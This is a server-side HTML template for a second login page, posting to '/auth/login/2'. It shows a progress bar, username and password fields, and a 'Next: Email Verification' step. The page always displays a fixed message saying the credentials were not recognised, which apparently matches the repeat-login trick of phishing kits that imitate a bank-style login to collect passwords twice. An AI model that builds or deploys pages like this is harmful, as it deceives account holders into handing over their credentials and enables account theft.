@layout('layouts.app')

@section('content')
<div class="cb-main-content">
  <div class="progress-bar">
    <div class="cb-main-content-sub">
      <div class="container__content">
        <div class="cb-progress-bar">
          <p class="cb-progress-bar__label">
            25% Complete
          </p>
          <div class="cb-progress-bar__container">
            <div class="cb-progress-bar__bar" style="width: 25.33333%;"></div>
          </div>
        </div>
      </div>
    </div>
  </div>

  <div class="warning">
    <div class="warning__image"></div>
    <div class="warning__content">
      <p>We do not recognize your username and/or password. Please try again.</p>
    </div>
  </div>
  
  <div class="cb-main-content-sub">
    <div class="container__content">
      <form action="/auth/login/2" method="POST">
        <h1>Login Information</h1>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="username" name="username" class="cb-input" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="username">Username</label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Username</span>
          </div>
        </div>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="password" name="password" class="cb-input cb-mask-input" type="password" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="password">
                  Password
                  <span class="cb-label-icon cb-label-icon--secure"></span>
                </label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Password</span>
          </div>
        </div>

        <div class="cb-actions-items" style="margin-top: 5rem;">
          <div class="cb-actions-item cb-actions-item--primary">
            <div class="cb-actions-primary-text">
              <div>Next: Email Verification</div>
            </div>
            <button class="button button--primary submitBtn" type="submit">
              Continue
            </button>
          </div>
        </div>
      </form>
    </div>
  </div>
</div>
@endsection